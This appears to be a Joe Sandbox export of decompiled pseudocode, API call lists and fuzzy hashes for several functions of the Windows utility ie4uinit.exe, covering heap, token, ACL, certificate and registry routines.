Opcode ID: 7d39892a5ec5724f0d6d85e7185d53eafd03025e0b408bae42bd87cb0366bb54
Instruction ID: b4c4d7a37bebd128832fda03d4bf35fc47dcd7c9a4d734a9c0fbf4240de67b67
Opcode Fuzzy Hash: 7d39892a5ec5724f0d6d85e7185d53eafd03025e0b408bae42bd87cb0366bb54
Instruction Fuzzy Hash: 01219633E08B829AE7609F20D8406A97364FB8475CF855235EA4C03A5CDF7CD095D720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D43CC Relevance: 12.2, APIs: 8, Instructions: 197
memoryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FF77FF7319D43CC(intOrPtr __edx, void* __rax, long long __rbx, long long __rcx, long long __r8) {
				void* __rsi;
				void* _t61;
				void* _t62;
				void* _t63;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t87;
				signed long long _t129;
				signed long long _t130;
				void* _t137;
				signed long long _t141;
				signed long long _t145;
				signed long long _t149;
				void* _t158;
				void* _t166;
				signed long long _t167;
				long _t170;
				void* _t173;
				signed long long _t174;
				void* _t186;
				void* _t187;
				long _t188;
				void* _t190;
				signed long long _t192;
				intOrPtr* _t193;
				void* _t195;
				void* _t197;

				_t133 = __rbx;
				 *((long long*)(_t173 + 0x20)) = __rbx;
				E00007FF77FF7319E4200(0x10e0, __rax, _t186, _t187);
				_t174 = _t173 - __rax;
				_t129 =  *0x319f4658; // 0x8be7dd1f02a
				_t130 = _t129 ^ _t174;
				 *(_t173 - 0xfe0 + 0xfd0) = _t130;
				 *((long long*)(_t174 + 0x68)) = __rcx;
				r14d = 1;
				 *(_t174 + 0x50) = _t166;
				 *((intOrPtr*)(_t174 + 0x60)) = r14d;
				 *(_t174 + 0x58) = _t166;
				r15d = 0;
				 *((long long*)(_t174 + 0x70)) = __r8;
				 *((intOrPtr*)(_t174 + 0x64)) = __edx;
				if (E00007FF77FF7319DA93C(0x5000001f, _t130, __rbx, _t166, _t197) != 0) goto 0x319d444e;
				_t61 = E00007FF77FF7319DA93C(0x50000020, _t130, _t133, _t166, _t195);
				r12b = sil;
				if (_t61 == 0) goto 0x319d4451;
				r12b = r14b;
				_t141 =  *0x319e5618; // 0x7ff7319ea2c0
				__imp__#682();
				if (_t61 < 0) goto 0x319d4615;
				_t80 =  *((intOrPtr*)(_t174 + 0x5c));
				if (_t80 -  *(_t174 + 0x58) >= 0) goto 0x319d4489;
				 *((intOrPtr*)(_t174 + 0x5c)) = _t80 + 1;
				if ( *((intOrPtr*)( *(_t174 + 0x50) + _t141 * 8)) == 0) goto 0x319d4615;
				_t192 =  *((intOrPtr*)(_t174 + 0x68));
				r14d =  *((intOrPtr*)(_t174 + 0x64));
				 *((intOrPtr*)(_t174 + 0x64)) = 0;
				_t62 = E00007FF77FF7319D480C(_t192,  *((intOrPtr*)( *(_t174 + 0x50) + _t141 * 8)), _t174 + 0x64);
				if (_t62 >= 0) goto 0x319d450c;
				r8d = 1;
				__imp__#665();
				if (_t62 != 0) goto 0x319d4531;
				r8d = 1;
				__imp__#665();
				if (_t62 != 0) goto 0x319d4531;
				_t145 =  *0x319e5748; // 0x7ff7319ea160
				_t63 = E00007FF77FF7319C6AA4(_t62,  *(_t174 + 0x50),  *((intOrPtr*)( *(_t174 + 0x50) + _t141 * 8)), _t174 + 0x68);
				if (_t63 < 0) goto 0x319d4536;
				if ( *((intOrPtr*)(_t174 + 0x68)) == 0) goto 0x319d4536;
				_t82 =  *((intOrPtr*)(_t174 + 0x5c));
				if (_t82 -  *(_t174 + 0x58) >= 0) goto 0x319d45f6;
				 *((intOrPtr*)(_t174 + 0x5c)) = _t82 + 1;
				goto 0x319d45f6;
				if (r12b == 0) goto 0x319d450c;
				 *((long long*)(_t174 + 0x40)) =  *((intOrPtr*)( *(_t174 + 0x50) + _t145 * 8));
				r8d = 1;
				 *((intOrPtr*)(_t174 + 0x38)) = 1;
				 *(_t174 + 0x30) = _t166;
				 *(_t174 + 0x28) = _t166;
				 *((intOrPtr*)(_t174 + 0x20)) = 0x1048;
				__imp__#651();
				if (_t63 < 0) goto 0x319d450c;
				E00007FF77FF7319C1670();
				if (_t130 == 0) goto 0x319d4588;
				E00007FF77FF7319D80E0( *(_t174 + 0x50), _t130);
				_t167 = _t130;
				if (_t167 == 0) goto 0x319d45be;
				 *((intOrPtr*)(_t167 + 0x14)) = r14d;
				 *((intOrPtr*)(_t167 + 0x10)) =  *((intOrPtr*)(_t192 + 0x6c)) + r15d;
				if (E00007FF77FF7319D8914(0, _t130,  *(_t174 + 0x50), _t167,  *((intOrPtr*)( *(_t174 + 0x50) + _t145 * 8))) < 0) goto 0x319d45be;
				_t149 = _t192;
				if (E00007FF77FF7319D46A0(_t65,  *(_t174 + 0x50), _t149, _t167) < 0) goto 0x319d45be;
				r15d = r15d + 1;
				_t87 =  *((intOrPtr*)(_t174 + 0x5c));
				if (_t87 -  *(_t174 + 0x58) >= 0) goto 0x319d45da;
				 *((intOrPtr*)(_t174 + 0x5c)) = _t87 + 1;
				if (_t167 == 0) goto 0x319d45f4;
				 *0x319e7038();
				_t137 =  *(_t174 + 0x50);
				if ( *((intOrPtr*)( *(_t174 + 0x50) + _t149 * 8)) != 0) goto 0x319d449c;
				r14d =  *((intOrPtr*)(_t174 + 0x60));
				_t193 =  *((intOrPtr*)(_t174 + 0x70));
				r14d =  !=  ? 0 : r14d;
				 *((intOrPtr*)(_t174 + 0x60)) = r14d;
				if (_t193 == 0) goto 0x319d461e;
				 *_t193 = r15d;
				if (_t137 == 0) goto 0x319d4670;
				if ( *(_t174 + 0x58) <= 0) goto 0x319d465c;
				if ( *((intOrPtr*)(_t137 +  *( *_t167 + 0x10) * 8)) == 0) goto 0x319d464f;
				GetProcessHeap();
				HeapFree(_t190, _t188, _t158);
				if (1 -  *(_t174 + 0x58) < 0) goto 0x319d462b;
				r14d =  *((intOrPtr*)(_t174 + 0x60));
				GetProcessHeap();
				HeapFree(_t166, _t170);
				return E00007FF77FF7319E38D0(r14d, _t87 + 1,  *(_t173 - 0xfe0 + 0xfd0) ^ _t174);
			}

0x7ff7319d43cc
0x7ff7319d43cc
0x7ff7319d43e9
0x7ff7319d43ee
0x7ff7319d43f1
0x7ff7319d43f8
0x7ff7319d43fb
0x7ff7319d4404
0x7ff7319d4409
0x7ff7319d440f
0x7ff7319d4419
0x7ff7319d441e
0x7ff7319d4423
0x7ff7319d4429
0x7ff7319d4430
0x7ff7319d443b
0x7ff7319d4442
0x7ff7319d4447
0x7ff7319d444c
0x7ff7319d444e
0x7ff7319d4451
0x7ff7319d445f
0x7ff7319d446c
0x7ff7319d4472
0x7ff7319d447d
0x7ff7319d4485
0x7ff7319d448c
0x7ff7319d4492
0x7ff7319d4497
0x7ff7319d44a1
0x7ff7319d44ab
0x7ff7319d44b2
0x7ff7319d44c0
0x7ff7319d44c8
0x7ff7319d44d0
0x7ff7319d44dc
0x7ff7319d44e1
0x7ff7319d44e9
0x7ff7319d44eb
0x7ff7319d44fd
0x7ff7319d4504
0x7ff7319d450a
0x7ff7319d450c
0x7ff7319d451c
0x7ff7319d4528
0x7ff7319d452c
0x7ff7319d4534
0x7ff7319d4541
0x7ff7319d4546
0x7ff7319d4549
0x7ff7319d4552
0x7ff7319d4557
0x7ff7319d455c
0x7ff7319d4564
0x7ff7319d456c
0x7ff7319d4573
0x7ff7319d457b
0x7ff7319d4580
0x7ff7319d4585
0x7ff7319d458d
0x7ff7319d4599
0x7ff7319d459d
0x7ff7319d45aa
0x7ff7319d45af
0x7ff7319d45b9
0x7ff7319d45bb
0x7ff7319d45be
0x7ff7319d45ce
0x7ff7319d45d6
0x7ff7319d45dd
0x7ff7319d45e9
0x7ff7319d45ef
0x7ff7319d45f9
0x7ff7319d45ff
0x7ff7319d4607
0x7ff7319d460c
0x7ff7319d4610
0x7ff7319d4618
0x7ff7319d461a
0x7ff7319d4621
0x7ff7319d4629
0x7ff7319d4634
0x7ff7319d4636
0x7ff7319d4644
0x7ff7319d4655
0x7ff7319d4657
0x7ff7319d465c
0x7ff7319d466a
0x7ff7319d469c

APIs

Part of subcall function 00007FF7319DA93C: LocalAlloc.KERNEL32(?,?,00000000,00007FF7319D36D0,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319DA961
Part of subcall function 00007FF7319DA93C: LocalFree.KERNEL32(?,?,00000000,00007FF7319D36D0,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319DA97C

#682.IERTUTIL(?,?,?,?,00000000,00000001,?,00007FF7319D36FD,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D445F
#665.IERTUTIL(?,?,?,?,00000000,00000001,?,00007FF7319D36FD,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D44C8
#665.IERTUTIL(?,?,?,?,00000000,00000001,?,00007FF7319D36FD,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D44E1
#651.IERTUTIL ref: 00007FF7319D4564
GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000001,?,00007FF7319D36FD,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D4636
HeapFree.KERNEL32(?,?,?,?,00000000,00000001,?,00007FF7319D36FD,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D4644
GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000001,?,00007FF7319D36FD,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D465C
HeapFree.KERNEL32(?,?,?,?,00000000,00000001,?,00007FF7319D36FD,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D466A

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$Free$#665LocalProcess$#651#682Alloc
String ID:
API String ID: 2616862846-0
Opcode ID: b17b185ef6ae81f409477f6b85c21ffa21aeede9a027e6ebff3cdfb2fc843f9d
Instruction ID: 9b4f3e71e71eb60acc9339062ade03bd39d8b303d0b99b51d82d72fcc57e7aa8
Opcode Fuzzy Hash: b17b185ef6ae81f409477f6b85c21ffa21aeede9a027e6ebff3cdfb2fc843f9d
Instruction Fuzzy Hash: 26816A32E086D2D2E714AF56E54416AE7A5FB84B98F844035EE4E43F9DCEBCE4419B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CA170 Relevance: 12.1, APIs: 8, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FF77FF7319CA170(void* __ecx, void* __edi, void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, void* __rsi, void* __r9, void* __r10) {
				void* __rbp;
				int _t45;
				signed short _t46;
				signed short _t48;
				signed short _t50;
				void* _t57;
				void* _t61;
				void* _t65;
				signed long long _t82;
				void* _t105;
				void* _t108;
				signed long long _t109;
				void* _t113;

				_t113 = __r9;
				_t86 = __rbx;
				_t65 = __ecx;
				 *((long long*)(_t108 + 8)) = __rbx;
				 *((long long*)(_t108 + 0x10)) = __rdi;
				_t3 = _t108 - 0x180; // -438
				_t109 = _t108 - 0x280;
				_t82 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t3 + 0x170) = _t82 ^ _t109;
				_t5 = _t109 + 0x60; // 0x2a
				if (E00007FF77FF7319C1310(__rbx, _t5, __rdx, __rcx, __r10) < 0) goto 0x319ca2ce;
				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0x00000000;
				GetCurrentProcess();
				_t45 = OpenProcessToken(??, ??, ??);
				if (_t45 == 0) goto 0x319ca2ba;
				 *(_t109 + 0x40) =  *(_t109 + 0x40) & 0x00000000;
				_t11 = _t109 + 0x50; // 0x1a
				 *(_t109 + 0x50) =  *(_t109 + 0x50) & 0x00000000;
				 *((long long*)(_t109 + 0x38)) = _t11;
				r9d = 0;
				 *(_t109 + 0x30) =  *(_t109 + 0x30) & 0x00000000;
				 *((long long*)(_t109 + 0x28)) = _t109 + 0x40;
				 *(_t109 + 0x20) =  *(_t109 + 0x20) & 0x00000000;
				_t23 = _t113 + 4; // 0x4
				r8d = _t23;
				__imp__GetNamedSecurityInfoW();
				if (_t45 != 0) goto 0x319ca29f;
				if ( *(_t109 + 0x40) == 0) goto 0x319ca28d;
				 *(_t109 + 0x48) =  *(_t109 + 0x48) & 0x00000000;
				_t46 = E00007FF77FF7319CA040(_t45, __esi, _t86,  *(_t109 + 0x40), _t109 + 0x48, __rsi, _t3);
				if (_t46 < 0) goto 0x319ca292;
				 *(_t109 + 0x30) =  *(_t109 + 0x30) & 0x00000000;
				r9d = 0;
				 *((long long*)(_t109 + 0x28)) =  *(_t109 + 0x48);
				 *(_t109 + 0x20) =  *(_t109 + 0x20) & 0x00000000;
				_t36 = _t113 + 4; // 0x4
				r8d = _t36;
				__imp__SetNamedSecurityInfoW();
				if (_t46 == 0) goto 0x319ca282;
				_t57 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
				LocalFree(_t105);
				goto 0x319ca292;
				_t48 = LocalFree(??);
				goto 0x319ca2ad;
				_t61 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
				CloseHandle(??);
				goto 0x319ca2ce;
				_t50 = GetLastError();
				_t64 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
				_t51 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
				return E00007FF77FF7319E38D0( <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000, _t65,  *(_t3 + 0x170) ^ _t109);
			}

0x7ff7319ca170
0x7ff7319ca170
0x7ff7319ca170
0x7ff7319ca170
0x7ff7319ca175
0x7ff7319ca17b
0x7ff7319ca183
0x7ff7319ca18a
0x7ff7319ca194
0x7ff7319ca1a3
0x7ff7319ca1b1
0x7ff7319ca1b7
0x7ff7319ca1bd
0x7ff7319ca1d0
0x7ff7319ca1d8
0x7ff7319ca1de
0x7ff7319ca1e4
0x7ff7319ca1e9
0x7ff7319ca1f4
0x7ff7319ca1f9
0x7ff7319ca1fc
0x7ff7319ca207
0x7ff7319ca20c
0x7ff7319ca216
0x7ff7319ca216
0x7ff7319ca21a
0x7ff7319ca222
0x7ff7319ca22c
0x7ff7319ca22e
0x7ff7319ca239
0x7ff7319ca242
0x7ff7319ca244
0x7ff7319ca254
0x7ff7319ca257
0x7ff7319ca25c
0x7ff7319ca266
0x7ff7319ca266
0x7ff7319ca26a
0x7ff7319ca272
0x7ff7319ca27f
0x7ff7319ca285
0x7ff7319ca28b
0x7ff7319ca297
0x7ff7319ca29d
0x7ff7319ca2aa
0x7ff7319ca2b2
0x7ff7319ca2b8
0x7ff7319ca2ba
0x7ff7319ca2cb
0x7ff7319ca2ce
0x7ff7319ca2f3

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7319CA1BD
OpenProcessToken.ADVAPI32 ref: 00007FF7319CA1D0
GetNamedSecurityInfoW.ADVAPI32 ref: 00007FF7319CA21A
LocalFree.KERNEL32 ref: 00007FF7319CA297

Part of subcall function 00007FF7319CA040: #57.IERTUTIL(00007FF7319CA530), ref: 00007FF7319CA068
Part of subcall function 00007FF7319CA040: GetLengthSid.ADVAPI32 ref: 00007FF7319CA07B
Part of subcall function 00007FF7319CA040: LocalAlloc.KERNEL32 ref: 00007FF7319CA0B0
Part of subcall function 00007FF7319CA040: memset.MSVCRT ref: 00007FF7319CA0C6
Part of subcall function 00007FF7319CA040: memcpy_s.MSVCRT ref: 00007FF7319CA0D8
Part of subcall function 00007FF7319CA040: AddAccessAllowedAceEx.ADVAPI32 ref: 00007FF7319CA0FC
Part of subcall function 00007FF7319CA040: LocalFree.KERNEL32 ref: 00007FF7319CA124
Part of subcall function 00007FF7319CA040: LocalFree.KERNEL32 ref: 00007FF7319CA13D

SetNamedSecurityInfoW.ADVAPI32 ref: 00007FF7319CA26A
LocalFree.KERNEL32 ref: 00007FF7319CA285
CloseHandle.KERNEL32 ref: 00007FF7319CA2B2
GetLastError.KERNEL32 ref: 00007FF7319CA2BA

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Local$Free$InfoNamedProcessSecurity$AccessAllocAllowedCloseCurrentErrorHandleLastLengthOpenTokenmemcpy_smemset
String ID:
API String ID: 347426353-0
Opcode ID: 3715311143da3f0ee7dcf3f3fc2ccf400d29d1a487cd90e5b283e34a910a7dfd
Instruction ID: 152b201eed04e3e9a9cec69e1ac604146cf3fb6d046810ce5cd8b848f7971e6f
Opcode Fuzzy Hash: 3715311143da3f0ee7dcf3f3fc2ccf400d29d1a487cd90e5b283e34a910a7dfd
Instruction Fuzzy Hash: 5B419832A1CBD196E750EB61E4443AAA3A5FB88798F804135DACD86558EFBDD404DB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DF7CC Relevance: 12.1, APIs: 8, Instructions: 77
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF77FF7319DF7CC(void* __eax, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				long _t12;
				long _t14;
				long _t16;
				long _t19;
				long _t21;
				long _t23;
				void* _t27;
				signed int _t29;
				void* _t31;
				long long _t51;
				long long _t67;
				void* _t74;

				_t51 = _t67;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = __rbp;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				 *((long long*)(_t51 + 0x20)) = __rdi;
				 *__rdx = __rbx;
				r8d = 0;
				__imp__CertGetCertificateContextProperty(_t74);
				if (__eax == 0) goto 0x319df878;
				E00007FF77FF7319C1670();
				if (_t51 == 0) goto 0x319df871;
				__imp__CertGetCertificateContextProperty();
				if (__eax == 0) goto 0x319df830;
				 *__rdx = _t51;
				goto 0x319df8af;
				_t12 = GetLastError();
				_t13 =  ==  ? 1 : _t12;
				_t43 =  ==  ? 1 : _t12;
				if (( ==  ? 1 : _t12) > 0) goto 0x319df853;
				_t14 = GetLastError();
				_t15 =  ==  ? 1 : _t14;
				_t27 =  ==  ? 1 : _t14;
				goto 0x319df867;
				_t16 = GetLastError();
				_t17 =  ==  ? 1 : _t16;
				_t28 = ( ==  ? 1 : _t16) & 0x0000ffff;
				_t29 = ( ==  ? 1 : _t16) & 0x0000ffff | 0x80070000;
				E00007FF77FF7319C1698(_t51, _t51);
				goto 0x319df8af;
				goto 0x319df8af;
				_t19 = GetLastError();
				_t20 =  ==  ? 1 : _t19;
				_t47 =  ==  ? 1 : _t19;
				if (( ==  ? 1 : _t19) > 0) goto 0x319df89b;
				_t21 = GetLastError();
				_t22 =  ==  ? 1 : _t21;
				_t31 =  ==  ? 1 : _t21;
				goto 0x319df8af;
				_t23 = GetLastError();
				_t24 =  ==  ? 1 : _t23;
				_t32 = ( ==  ? 1 : _t23) & 0x0000ffff;
				_t33 = ( ==  ? 1 : _t23) & 0x0000ffff | 0x80070000;
				return ( ==  ? 1 : _t23) & 0x0000ffff | 0x80070000;
			}

0x7ff7319df7cc
0x7ff7319df7cf
0x7ff7319df7d3
0x7ff7319df7d7
0x7ff7319df7db
0x7ff7319df7ed
0x7ff7319df7f6
0x7ff7319df7fc
0x7ff7319df804
0x7ff7319df808
0x7ff7319df813
0x7ff7319df821
0x7ff7319df829
0x7ff7319df82b
0x7ff7319df82e
0x7ff7319df830
0x7ff7319df83d
0x7ff7319df840
0x7ff7319df842
0x7ff7319df844
0x7ff7319df84c
0x7ff7319df84f
0x7ff7319df851
0x7ff7319df853
0x7ff7319df85b
0x7ff7319df85e
0x7ff7319df861
0x7ff7319df86a
0x7ff7319df86f
0x7ff7319df876
0x7ff7319df878
0x7ff7319df885
0x7ff7319df888
0x7ff7319df88a
0x7ff7319df88c
0x7ff7319df894
0x7ff7319df897
0x7ff7319df899
0x7ff7319df89b
0x7ff7319df8a3
0x7ff7319df8a6
0x7ff7319df8a9
0x7ff7319df8cb

APIs

CertGetCertificateContextProperty.CRYPT32 ref: 00007FF7319DF7FC
CertGetCertificateContextProperty.CRYPT32 ref: 00007FF7319DF821
GetLastError.KERNEL32 ref: 00007FF7319DF830
GetLastError.KERNEL32 ref: 00007FF7319DF844
GetLastError.KERNEL32 ref: 00007FF7319DF878
GetLastError.KERNEL32 ref: 00007FF7319DF88C

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CertCertificateContextProperty$HeapProcess
String ID:
API String ID: 1250319754-0
Opcode ID: 2439d672701580d8fa277a9f1c8205b584c5dd442eff81ca5e730ec79d6f2e66
Instruction ID: 9c223400e46d7f1bdcfe7e178af916a49b01a5c899b3c252ba9d5ab9dc2f3670
Opcode Fuzzy Hash: 2439d672701580d8fa277a9f1c8205b584c5dd442eff81ca5e730ec79d6f2e66
Instruction Fuzzy Hash: 60218422F08BD296F7407F669896769A394EF44F94F984134C94AC3358DEACE841A331

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C4AB8 Relevance: 10.6, APIs: 7, Instructions: 140registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00007FF7319C4B17
RegEnumKeyExW.ADVAPI32 ref: 00007FF7319C4B91
RegOpenKeyExW.ADVAPI32 ref: 00007FF7319C4BB8

Part of subcall function 00007FF7319C4AB8: RegCloseKey.ADVAPI32 ref: 00007FF7319C4BD7

RegEnumValueW.ADVAPI32 ref: 00007FF7319C4C59
_wcsnicmp.MSVCRT ref: 00007FF7319C4C79
RegDeleteValueW.ADVAPI32 ref: 00007FF7319C4C89

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: EnumValue$CloseDeleteHeapInfoOpenProcessQuery_wcsnicmp
String ID:
API String ID: 3392893151-0
Opcode ID: a06eb7b2b7144f3cf6f192f9581c61d55fcc7beac6f79bd178f180a9707cba66
Instruction ID: ea4404264eff2a7ea60d3e6d0602bd358bea1c0d65da01a5b6d0f583c3b7f97b
Opcode Fuzzy Hash: a06eb7b2b7144f3cf6f192f9581c61d55fcc7beac6f79bd178f180a9707cba66
Instruction Fuzzy Hash: BA516C32F08A919AEB50DF61D4843BD73A4BB45B9CF400239DA9E47B98DF78D444DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C709C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF7319C70F4
wcschr.MSVCRT ref: 00007FF7319C710B

Strings

Software\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF7319C70AE
\\?\, xrefs: 00007FF7319C7186

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: wcschr
String ID: Software\Microsoft\Windows\CurrentVersion\Policies$\\?\
API String ID: 1497570035-1297041245
Opcode ID: 0fcb7489d3135d57d878f35b73a8cb52936170dab344db62fd25c72e9128af6f
Instruction ID: d5c84ae130ba3a4e391cfacd4859ab40afd9897ad559670c254005b5a0bd1c51
Opcode Fuzzy Hash: 0fcb7489d3135d57d878f35b73a8cb52936170dab344db62fd25c72e9128af6f
Instruction Fuzzy Hash: 85316662F48681A1EB18AF159C40179A3B5FF94BA8BC58531C9ED433D8EFBCD841E720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E134C Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1370
HeapAlloc.KERNEL32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E138A
GetTokenInformation.ADVAPI32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E13AB
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E13BA
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E13CE
HeapFree.KERNEL32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E13F9

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Heap$AllocFreeInformationToken
String ID:
API String ID: 1666231400-0
Opcode ID: 70ac26f172b2e42c89a6b87ea1eb1fd6b4899665035df3632c5d5b7e08289252
Instruction ID: d0f94e8615d5ae57b48805feb9a97581e13dd33fda360793f05dc2db388f648b
Opcode Fuzzy Hash: 70ac26f172b2e42c89a6b87ea1eb1fd6b4899665035df3632c5d5b7e08289252
Instruction Fuzzy Hash: 94217F21F0CB92D5E714AB26E944669E390BF48F98F948434DE4D87758EEBCE441A370

Uniqueness

Uniqueness Score: -1.00%

